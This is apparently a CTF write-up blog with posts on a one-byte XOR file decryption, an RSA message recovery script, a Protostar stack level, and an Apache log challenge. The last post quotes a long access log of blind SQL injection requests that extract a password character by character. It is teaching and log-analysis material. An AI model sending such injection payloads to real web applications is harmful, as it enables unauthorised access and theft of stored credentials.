Saturday, February 25, 2017

AgriHack : XOR Crypto (Forgot the Challenge Name)


Here we are given 2 files: the first is an encrypted PDF file, and the second is the program used to encrypt that file.


The encryption program shows that every byte of the file is XORed with a key obtained from the function os.urandom(1), which is stored in the variable randomku. Fortunately the key used is only 1 byte, so it is entirely feasible for us to brute-force it. Let's write a script to decrypt the file: because the file is encrypted only by XORing it with the key, we can decrypt it with just a small modification to the encryption program.


After running it, we get the PDF file we want.


Flag : AGRI{do_y0u_3ven_bruteforce}
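The decryption step described above, as an added example rather than the script from the original post. The function names and the sample bytes are assumptions, and the encryption side is reconstructed only from the description (one os.urandom(1) byte XORed over every byte of the file).

```python
import os

PDF_MAGIC = b"%PDF-"  # every PDF file starts with these bytes


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same one-byte key (encrypting and decrypting are identical)."""
    return bytes(b ^ key for b in data)


def encrypt(data: bytes) -> bytes:
    """Reconstruction of the scheme the post describes (assumed, not the original program)."""
    randomku = os.urandom(1)[0]  # the whole key space is 256 values
    return xor_bytes(data, randomku)


def brute_force_keys(ciphertext: bytes) -> list:
    """Try all 256 keys and keep those whose output starts with the PDF magic."""
    head = ciphertext[:len(PDF_MAGIC)]
    return [k for k in range(256) if xor_bytes(head, k) == PDF_MAGIC]


def key_from_known_plaintext(ciphertext: bytes) -> int:
    """Shortcut: the first plaintext byte is known to be '%', so key = c[0] XOR '%'."""
    return ciphertext[0] ^ PDF_MAGIC[0]


def decrypt_pdf(ciphertext: bytes) -> tuple:
    """Return (key, plaintext), or raise if no key produces a PDF header."""
    keys = brute_force_keys(ciphertext)
    if len(keys) != 1:
        raise ValueError("no single-byte key yields a PDF header")
    return keys[0], xor_bytes(ciphertext, keys[0])


# Constructed stand-in for the challenge file (not the real PDF).
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"

if __name__ == "__main__":
    ct = encrypt(SAMPLE_PDF)
    key, pt = decrypt_pdf(ct)
    print("key = 0x%02x, plaintext recovered: %s" % (key, pt == SAMPLE_PDF))
```

Because the file format fixes the first plaintext byte, the key falls out of a single XOR; the 256-key loop is only a cross-check.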

Tuesday, February 21, 2017

Protostar : Stack0


This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution.




yeay..  variable modified has been modified..\\m// \\0//

Saturday, February 18, 2017

Pwnerrank : RSA - Basic

Task :
Challenge : Recover the original message M,
use www.factordb.com to get p and q, 

p = 15100118367560938297
q =  18238194893394268367

ok let's start to recover..

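#!/usr/bin/env python3
# Johan Wahyudi
# Recover M from c using the factors p and q of n.
p = 15100118367560938297
q = 18238194893394268367
e = 5
c = 170841202002112185870598344402287193795
n = p * q
phi = (p - 1) * (q - 1)
# Private exponent: modular inverse of e mod phi.
# The built-in pow (Python 3.8+) replaces gmpy.invert here.
d = pow(e, -1, phi)
# Decrypt and show the message as a hex string.
pesan = hex(pow(c, d, n))[2:]
#pesan_asli = bytes.fromhex(pesan).decode()
print(pesan)
#print(pesan_asli)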

Pwnerrank : Apache Access Log


We are given an access log file from an Apache service, and the challenge clue tells us that there was an SQL injection attack on the server. Let's analyze it. Feel free to write your own analysis script, or analyze it manually if you prefer, since writing a script also requires analyzing the log first hehe..

If you don't know what SQL injection is yet, look it up on Google first :), especially blind SQL injection,
because the attack in this log is a blind SQL injection.

Log :
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /?id=7%20and%20length(password)%3E5 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /?id=7%20and%20length(password)%3E10 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /?id=7%20and%20length(password)%3E15 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /?id=7%20and%20length(password)%3E20 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:31 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /?id=7%20and%20length(password)=19 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /?id=7%20and%20length(password)=18 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:32 -0400] "GET /?id=7%20and%20length(password)=17 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /?id=7%20and%20length(password)=16 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:33 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:34 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E67 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E69 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /?id=7%20and%20ord(substr(password,1,1))%3E70 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:35 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:36 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E71 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E75 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E77 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:37 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /?id=7%20and%20ord(substr(password,2,1))%3E76 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:38 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:39 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E67 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E65 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:40 -0400] "GET /?id=7%20and%20ord(substr(password,3,1))%3E64 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:41 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:42 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E67 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E69 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /?id=7%20and%20ord(substr(password,4,1))%3E70 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:43 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E111 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E119 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E123 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:44 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E121 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /?id=7%20and%20ord(substr(password,5,1))%3E122 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:45 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:46 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E67 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E65 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /?id=7%20and%20ord(substr(password,6,1))%3E66 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:47 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:48 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,7,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:49 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:50 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /?id=7%20and%20ord(substr(password,8,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:51 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:52 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E109 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /?id=7%20and%20ord(substr(password,9,1))%3E108 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:53 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:54 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E71 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E75 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:55 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E73 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /?id=7%20and%20ord(substr(password,10,1))%3E72 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:56 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E111 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E119 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:57 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E115 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E113 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /?id=7%20and%20ord(substr(password,11,1))%3E114 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:58 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E95 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E79 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:40:59 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E71 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E67 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:00 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E65 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /?id=7%20and%20ord(substr(password,12,1))%3E66 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:01 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
